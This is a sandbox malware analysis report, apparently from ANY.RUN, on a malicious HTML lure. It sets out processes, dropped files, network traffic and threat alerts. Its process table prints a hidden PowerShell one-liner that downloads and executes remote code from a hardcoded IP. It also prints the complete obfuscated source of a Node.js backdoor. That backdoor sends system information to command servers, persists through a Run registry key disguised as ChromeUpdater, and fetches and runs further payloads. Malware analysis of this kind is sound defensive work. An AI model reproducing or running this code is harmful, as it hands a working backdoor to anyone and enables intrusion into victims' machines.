download:

/

Full analysis: https://app.any.run/tasks/fb5d0399-a137-48ef-a039-c4c229f5c1bc
Verdict: Malicious activity
Analysis date: April 15, 2025, 16:30:52
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
qrcode
Indicators:
MIME: text/html
File info: HTML document, ASCII text, with very long lines (1172), with no line terminators
MD5:

7FA467D54CB91AF033CD4E2411163D12

SHA1:

A957929F7D985D924099C52B285FB1B072B824D4

SHA256:

D13D0A4E1E59949C81EBE5AC154D94D9B2263C945DB28C7225DD9DBA8F337EE0

SSDEEP:

24:hM0mIJfA+xRhcxKNt+W+urZN/p9bRXHMBe2sgR5AEg5pEI:lmI++x4S9weeRqTpx

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Connects to the CnC server

      • powershell.exe (PID: 5968)

  • SUSPICIOUS

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 5968)

    • Uses SYSTEMINFO.EXE to read the environment

      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 5512)

    • The process checks if current user has admin rights

      • node.exe (PID: 4408)

    • Get information on the list of running processes

      • node.exe (PID: 4408)
      • powershell.exe (PID: 5512)

    • Checks a user's role membership (POWERSHELL)

      • powershell.exe (PID: 5512)

    • Starts POWERSHELL.EXE for commands execution

      • node.exe (PID: 4408)

    • Starts application with an unusual extension

      • powershell.exe (PID: 5512)

    • Process uses ARP to discover network configuration

      • powershell.exe (PID: 5512)

    • Executes script using NodeJS

      • node.exe (PID: 4408)

  • INFO

    • Disables trace logs

      • powershell.exe (PID: 5968)

    • Checks proxy server information

      • powershell.exe (PID: 5968)
      • slui.exe (PID: 7916)

    • The executable file from the user directory is run by the Powershell process

      • node.exe (PID: 4408)

    • Checks supported languages

      • node.exe (PID: 4408)
      • chcp.com (PID: 7404)

    • Reads the software policy settings

      • slui.exe (PID: 7916)
      • slui.exe (PID: 2340)

    • Changes the display of characters in the console

      • powershell.exe (PID: 5512)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 5512)
      • powershell.exe (PID: 5968)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 5968)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 5968)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.htm/html | HyperText Markup Language with DOCTYPE (80.6)
.html | HyperText Markup Language (19.3)
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
152
Monitored processes
16
Malicious processes
1
Suspicious processes
2

Behavior graph

Click at the process to see the details
start powershell.exe conhost.exe no specs sppextcomobj.exe no specs slui.exe systeminfo.exe no specs tiworker.exe no specs slui.exe node.exe conhost.exe no specs powershell.exe no specs conhost.exe no specs chcp.com no specs systeminfo.exe no specs tiworker.exe no specs tasklist.exe no specs arp.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2340"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
2616\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2772"C:\WINDOWS\system32\systeminfo.exe"C:\Windows\System32\systeminfo.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Displays system information
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\systeminfo.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
2980\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4408"C:\Users\admin\AppData\Roaming\node-v22.11.0-win-x64\node.exe" -e "const a0I=a0W;(function(g,L){const P=a0W,B=g();while(!![]){try{const W=parseInt(P(0x18a))/0x1*(parseInt(P(0x18f))/0x2)+-parseInt(P(0x16e))/0x3+parseInt(P(0x15a))/0x4*(-parseInt(P(0x14a))/0x5)+-parseInt(P(0x15f))/0x6+-parseInt(P(0x160))/0x7+-parseInt(P(0x15c))/0x8*(-parseInt(P(0x18e))/0x9)+-parseInt(P(0x170))/0xa*(-parseInt(P(0x193))/0xb);if(W===L)break;else B['push'](B['shift']());}catch(x){B['push'](B['shift']());}}}(a0B,0x587b1));const a0L=(function(){let g=!![];return function(L,B){const W=g?function(){const Q=a0W;if(B){const x=B[Q(0x1a1)](L,arguments);return B=null,x;}}:function(){};return g=![],W;};}()),a0g=a0L(this,function(){const a=a0W,g=function(){const C=a0W;let x;try{x=Function(C(0x176)+'{}.constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(n){x=window;}return x;},L=g(),B=L[a(0x15e)]=L[a(0x15e)]||{},W=['log','warn',a(0x1a4),a(0x192),a(0x14d),a(0x153),a(0x1a5)];for(let x=0x0;x<W['length'];x++){const n=a0L[a(0x1aa)][a(0x185)][a(0x158)](a0L),S=W[x],K=B[S]||n;n[a(0x163)]=a0L['bind'](a0L),n[a(0x1a2)]=K[a(0x1a2)][a(0x158)](K),B[S]=n;}});function a0B(){const j=['message','chcp\x2065001\x20>\x20NUL\x202>&1\x20&\x20echo\x20\x27version:\x20','gzipSync','9fGiTzq','2dTKoZZ','off','fail\x20connect\x20to\x20server','error','2673WXSYyU','POST','writeFileSync','\x20/t\x20REG_SZ\x20/d\x20','statusCode','.log','log','zlib','mkdirSync','push','delay','fromCharCode','\x20get\x20commandline','177.136.225.153','apply','toString','useActive','info','trace','path','request','split','http','constructor','headers','replace','powershell.exe','CMD','application/octet-stream','wmic\x20process\x20where\x20processid=','join','reg\x20add\x20','15XDTlNk','replaceAll','\x27\x20;\x20if\x20([Security.Principal.WindowsIdentity]::GetCurrent().Name\x20-match\x20\x27(?i)SYSTEM\x27)\x20\x20{\x20\x27Runas:\x20System\x27\x20}\x20elseif\x20(([Security.Principal.WindowsPrincipal]\x20[Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))\x20{\x20\x27Runas:\x20Admin\x27\x20}\x20else\x20{\x20\x27Runas:\x20User\x27\x20}\x20;\x20systeminfo\x20;\x20echo\x20\x27=-=-=-=-=-\x27\x20;\x20tasklist\x20/svc\x20;\x20echo\x20\x27=-=-=-=-=-\x27\x20;\x20Get-Service\x20|\x20Select-Object\x20-Property\x20Name,\x20DisplayName\x20|\x20Format-List\x20;\x20echo\x20\x27=-=-=-=-=-\x27\x20;\x20Get-PSDrive\x20-PSProvider\x20FileSystem\x20|\x20Format-Table\x20-AutoSize\x20;\x20echo\x20\x27=-=-=-=-=-\x27\x20;\x20arp\x20-a','exception','ignore','floor','Execution\x20error:','alloc','EXE','table','ChromeUpdater','cmd.exe','DLL','atst','bind','\x20/v\x20','202892UqGoLI','StatusCode:','3910328NVkkzS','concat','console','1415088oQRpwQ','4472678IDLYVi','child_process','utf-8','__proto__','writeUInt32LE','rundll32.exe','188.34.195.44','chcp\x2065001\x20>\x20$null\x202>&1\x20;\x20echo\x20\x27version:\x20','argv','trim','length','connect\x20to:','node.exe','Error\x20with\x20HTTP\x20request:','1453047WvSbot','subarray','33590fTzNKY','write','pid','45.61.136.202','stderr','match','return\x20(function()\x20','HKCU\x5cSoftware\x5cMicrosoft\x5cWindows\x5cCurrentVersion\x5cRun','unref','readUInt32LE','start','utf8','data','\x27\x20&\x20echo\x20\x27Runas:\x20Unknown\x27\x20&\x20systeminfo','end','close',',start','random','.dll','ooff','ACTIVE','prototype','\x20/f','exit','env','from','568709plXMPo'];a0B=function(){return j;};return a0B();}function a0W(g,L){const B=a0B();return a0W=function(W,x){W=W-0x147;let n=B[W];return n;},a0W(g,L);}a0g();const http=require(a0I(0x1a9)),{execSync,exec,spawn}=require(a0I(0x161)),fs=require('fs'),path=require(a0I(0x1a6)),zlib=require(a0I(0x19a));if(process['argv'][0x1]!==undefined&&process['argv'][0x2]===undefined){const child=spawn(process[a0I(0x168)][0x0],[process['argv'][0x1],'1'],{'detached':!![],'stdio':a0I(0x14e),'windowsHide':!![]});child[a0I(0x178)](),process[a0I(0x187)](0x0);}const ver='000012',PORT_HTTP=0x50,PORT_IP=0x1bb,PORT=0x5a3;let sysinfo=null;function initSysInfo(){const F=a0I;let g;try{let W=execSync(F(0x167)+ver+F(0x14c),{'encoding':F(0x162),'shell':F(0x1ad),'windowsHide':!![]});g=Buffer[F(0x189)](W,F(0x162));}catch(x){try{let n=execSync(F(0x18c)+ver+F(0x17d),{'encoding':F(0x162),'shell':F(0x155),'windowsHide':!![]});g=Buffer[F(0x189)](n,F(0x162));}catch(S){console[F(0x192)](F(0x150),S[F(0x18b)]);}}const L=Buffer[F(0x151)](0x4);L['writeUInt32LE'](Math[F(0x181)]()*0x5f5e100);const B=Buffer[F(0x151)](0x2);B['writeUInt16LE'](0x2f),sysinfo=Buffer[F(0x15d)]([L,B,g]);}function xor(g,L){const v=a0I;let B=L[0x0];for(let W=0x0,x=g[v(0x16a)];W<x;++W){B+=(B+W%0x100)%0x100,g[W]^=(L[W%0x4]^B)%0x100;}}const zlibKey=Buffer[a0I(0x151)](0x4);zlibKey[a0I(0x164)](0xfafbfdfe);const encKey=Buffer['alloc'](0x4);encKey[a0I(0x164)](0xfafbfdff);function enc(g){const y=a0I,L=Buffer['alloc'](0x4);return L[y(0x164)](Math['random']()*0x5f5e100),xor(g,L),Buffer[y(0x15d)]([zlib[y(0x18d)](Buffer[y(0x15d)]([g,L,encKey])),zlibKey]);}function atst(){const R=a0I,g=R(0x147)+process[R(0x172)]+R(0x19f);exec(g,{'windowsHide':!![]},(L,B,W)=>{const u=R;if(L){console[u(0x192)](''+L[u(0x18b)]);return;}if(W){console[u(0x192)](''+W);return;}const x=String[u(0x19e)](0x22);let n;if(B[u(0x1a2)]()[u(0x175)](/\s-e\s/g)){const K=B[u(0x1a2)]()[u(0x1a8)]('\x0a',0x2)[0x1][u(0x169)]()[u(0x1a8)](/node\.exe.*?\s-e\s+/,0x2)[0x1]['trim']()[u(0x14b)](x,''),H=process[u(0x168)][0x0][u(0x1ac)](u(0x16c),randStr(0x8)+u(0x198));fs[u(0x195)](H,K),n=process[u(0x168)][0x0]+'\x20'+H;}else n=process[u(0x168)][0x0]+'\x20'+process[u(0x168)][0x1];const S=u(0x149)+x+u(0x177)+x+u(0x159)+x+u(0x154)+x+u(0x196)+x+n[u(0x14b)](x,'\x5c'+x)+x+u(0x186);exec(S,{'windowsHide':!![]},(e,D,f)=>{const h=u;e&&console[h(0x192)](''+e[h(0x18b)]),f&&console[h(0x192)](''+f);});});}const TypeFile={'EXE':0x0,'DLL':0x1,'JS':0x2,'CMD':0x3,'ACTIVE':0x4,'OTHER':0x5};function randStr(g){const t=a0I;return Math[t(0x181)]()['toString'](0x24)['substring'](0x2,g+0x2);}function start(g,L){const o=a0I;let B,W=[];switch(L){case TypeFile[o(0x152)]:B=g,W=[];break;case TypeFile[o(0x156)]:B=o(0x165),W=[g+o(0x180)];break;case TypeFile['JS']:B=process['argv'][0x0],W=['-e',g];break;default:return;}const x=spawn(B,W,{'detached':!![],'stdio':o(0x14e),'windowsHide':!![]});x[o(0x178)]();}let lastCmd=null;function startCmd(g){const p=a0I;let L;try{L=spawn(g,{'shell':'cmd.exe','windowsHide':!![]});}catch(W){console['error'](''+W[p(0x18b)]);return;}let B='';L['stdout']['on'](p(0x17c),x=>{const l=p;B+=x[l(0x1a2)]();}),L[p(0x174)]['on']('data',x=>{const O=p;B+=x[O(0x1a2)]();}),L['on'](p(0x17f),x=>{lastCmd=B;});}function main(g,L){const Z=a0I;console[Z(0x199)](Z(0x16b),g);let B=sysinfo;lastCmd!==null?(B=Buffer['concat']([sysinfo,Buffer['from']('\x0a=-c=-m=-d=-=-\x0a','utf-8'),Buffer[Z(0x189)](lastCmd,Z(0x162))]),lastCmd=null):B=Buffer[Z(0x15d)]([sysinfo]);B=enc(B);const W={'hostname':g,'port':L,'path':'/init1234','method':Z(0x194),'headers':{'Content-Type':Z(0x1af),'Content-Length':B[Z(0x16a)]}};return new Promise((x,n)=>{const N=Z,S=http[N(0x1a7)](W,K=>{const k=N,H=[];console[k(0x199)](K[k(0x1ab)]),console[k(0x199)](k(0x15b),K['statusCode']),K['on'](k(0x17c),e=>{const E=k;H[E(0x19c)](e);}),K['on'](k(0x17e),()=>{const s=k,D=Buffer[s(0x15d)](H);if(K[s(0x197)]!==0xc8&&K[s(0x197)]!==0xcc){n(s(0x191));return;}if(K[s(0x197)]===0xcc){x({});return;}if(D[s(0x16a)]===0x4&&D[s(0x1a2)]()===s(0x183))console[s(0x199)](s(0x190)),process[s(0x187)](0x0);else{if(D[s(0x16a)]===0x4&&D[s(0x1a2)]()===s(0x157)){console['log'](s(0x157));try{atst();}catch(d){console[s(0x192)](d);}x({});return;}}const f=D['subarray'](0x0,D[s(0x16a)]-0x4),z=D[s(0x16f)](D[s(0x16a)]-0x4,D[s(0x16a)]);xor(f,z);const Y=f[f[s(0x16a)]-0x1],V=f[s(0x16f)](0x0,f[s(0x16a)]-0x1);let q;switch(Y){case TypeFile['EXE']:q='.exe';break;case TypeFile[s(0x156)]:q=s(0x182);break;case TypeFile['JS']:q='.js';break;case TypeFile[s(0x1ae)]:startCmd(V[s(0x1a2)](s(0x17b))),x({});return;case TypeFile[s(0x184)]:useActive=V[s(0x179)](),x({});return;default:q=s(0x198);break;}let w;Y===TypeFile['JS']?w=V[s(0x1a2)](s(0x17b)):(w=path[s(0x148)](process[s(0x188)]['APPDATA'],randStr(0x8)),fs[s(0x19b)](w,{'recursive':!![]}),w=path[s(0x148)](w[s(0x1a2)](),randStr(0x8)+q),fs['writeFileSync'](w,V),console[s(0x199)](s(0x17a),w)),start(w,Y),x({});});});S['on'](N(0x192),K=>{n(K);}),S[N(0x171)](B),S[N(0x17e)]();});}initSysInfo();const hostsIp=[a0I(0x173),a0I(0x166),a0I(0x1a0)];let useIp=0x0,delay=0x1,useActive=0x0;async function mainloop(){const c=a0I;let g=hostsIp[Math[c(0x14f)](Math[c(0x181)]()*0x3e8)%hostsIp[c(0x16a)]];while(!![]){console[c(0x199)](c(0x19d),delay),await new Promise(L=>setTimeout(L,delay));try{await main(g,PORT_IP);}catch(L){console['error'](c(0x16d),L[c(0x18b)]),g=hostsIp[Math[c(0x14f)](Math[c(0x181)]()*0x3e8)%hostsIp[c(0x16a)]],useIp++,delay=0x3e8*0xa,useActive=0x0;continue;}console[c(0x199)](c(0x1a3),useActive),useActive>0x0?(delay=0x3e8*0xa,--useActive):delay=0x3e8*0x3c*0x5;}}mainloop();" C:\Users\admin\AppData\Roaming\node-v22.11.0-win-x64\node.exe
powershell.exe
User:
admin
Company:
Node.js
Integrity Level:
MEDIUM
Description:
Node.js JavaScript Runtime
Version:
22.11.0
Modules
Images
c:\users\admin\appdata\roaming\node-v22.11.0-win-x64\node.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\advapi32.dll
4920C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
5512powershell.exe -c "chcp 65001 > $null 2>&1 ; echo 'version: 000012' ; if ([Security.Principal.WindowsIdentity]::GetCurrent().Name -match '(?i)SYSTEM') { 'Runas: System' } elseif (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { 'Runas: Admin' } else { 'Runas: User' } ; systeminfo ; echo '=-=-=-=-=-' ; tasklist /svc ; echo '=-=-=-=-=-' ; Get-Service | Select-Object -Property Name, DisplayName | Format-List ; echo '=-=-=-=-=-' ; Get-PSDrive -PSProvider FileSystem | Format-Table -AutoSize ; echo '=-=-=-=-=-' ; arp -a"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exenode.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
5892\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exenode.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5968"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -c "$a=159; $b=223; $c=139; $d=207; $e=':8080/'; $u=[string]$a+'.'+$b+'.'+$c+'.'+$d+$e; $t=[math]::Floor(([datetime]::UtcNow-[datetime]'1970-01-01').TotalSeconds/16)*16; iex(irm($u+$t))"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6700"C:\WINDOWS\system32\ARP.EXE" -aC:\Windows\System32\ARP.EXEpowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Arp Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\arp.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\snmpapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
Total events
79 452
Read events
79 447
Write events
5
Delete events
0

Modification events

(PID) Process:(7584) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdHigh
Value:
31174179
(PID) Process:(7584) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdLow
Value:
(PID) Process:(5968) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
Operation:writeName:{2781761E-28E0-4109-99FE-B9D127C57AFE} {56FFCC30-D398-11D0-B2AE-00A0C908FA49} 0xFFFF
Value:
0100000000000000B228E4F523AEDB01
(PID) Process:(7628) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdHigh
Value:
31174180
(PID) Process:(7628) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdLow
Value:
Executable files
15
Suspicious files
1 817
Text files
693
Unknown types
0

Dropped files

PID
Process
Filename
Type
5968powershell.exeC:\Users\admin\AppData\Local\Temp\downloaded.zip
MD5:
SHA256:
5968powershell.exeC:\Users\admin\AppData\Roaming\node-v22.11.0-win-x64\node.exe
MD5:
SHA256:
5968powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lxvnir21.04u.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5968powershell.exeC:\Users\admin\AppData\Roaming\node-v22.11.0-win-x64\CHANGELOG.mdhtml
MD5:50E67CCCAB5C16A988474497C21E060B
SHA256:B8AEC39E3CF2FBDF90D560FED838A5AD0DE61420DE69F5696F7BBB60D1C0C8B2
5968powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF10c19c.TMPbinary
MD5:D040F64E9E7A2BB91ABCA5613424598E
SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
5968powershell.exeC:\Users\admin\AppData\Roaming\node-v22.11.0-win-x64\npm.ps1text
MD5:6BD887F4990DFE1A5B9680BD1FC4B44E
SHA256:E2F6B65E0F21781D3FB567898F1E38B922DB809DE490340499B4403CDB14FE75
5968powershell.exeC:\Users\admin\AppData\Roaming\node-v22.11.0-win-x64\nodevars.battext
MD5:E6636C5B093F5CC13DFB7508305B8D8B
SHA256:A2B020E2F641524C6FD1B8EBBCD9EE03C7DC44009F2B78E701E773AD048BE9A5
5968powershell.exeC:\Users\admin\AppData\Roaming\node-v22.11.0-win-x64\corepack.cmdtext
MD5:C046E14548EBB384EF71C0EFEA0E857A
SHA256:920630A1D1EC47AEDEA7345E3C868ECDC07E191373497BBF47FBBF5942FBAD4F
5968powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_deim3qt3.25q.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5968powershell.exeC:\Users\admin\AppData\Roaming\node-v22.11.0-win-x64\npx.cmdtext
MD5:39D6A2470D8B908F3D2A78F519A91DD9
SHA256:4DD3574F4396FC3B45C52B6AC80FD52BE2DD2660D2A153B4CC807DBBFEEFA7A0
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
26
DNS requests
15
Threats
6

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
GET
200
2.16.241.19:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5968
powershell.exe
GET
200
159.223.139.207:8080
http://159.223.139.207:8080/1744734656
unknown
unknown
7788
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
4408
node.exe
POST
204
188.34.195.44:443
http://188.34.195.44:443/init1234
unknown
unknown
5968
powershell.exe
POST
200
159.223.139.207:8080
http://159.223.139.207:8080/1744734656
unknown
unknown
7788
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
2.16.241.19:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2104
svchost.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5496
MoUsoCoreWorker.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2112
svchost.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
5968
powershell.exe
159.223.139.207:8080
DIGITALOCEAN-ASN
US
unknown
6544
svchost.exe
20.190.160.131:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 2.16.241.19
whitelisted
google.com
  • 142.250.186.110
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
login.live.com
  • 20.190.160.131
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
nodejs.org
  • 104.20.3.6
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.95.31.18
whitelisted

Threats

PID
Process
Class
Message
5968
powershell.exe
A Network Trojan was detected
ET MALWARE Generic Malware CnC Activity - (Unix Timestamp In HTTP URI)
5968
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
5968
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
5968
powershell.exe
A suspicious string was detected
SUSPICIOUS [ANY.RUN] Decoding FromBase64 HTTP URI String
5968
powershell.exe
Misc activity
SUSPICIOUS [ANY.RUN] Sent Host Name in HTTP POST Body
4408
node.exe
Potentially Bad Traffic
ET INFO HTTP traffic on port 443 (POST)
No debug info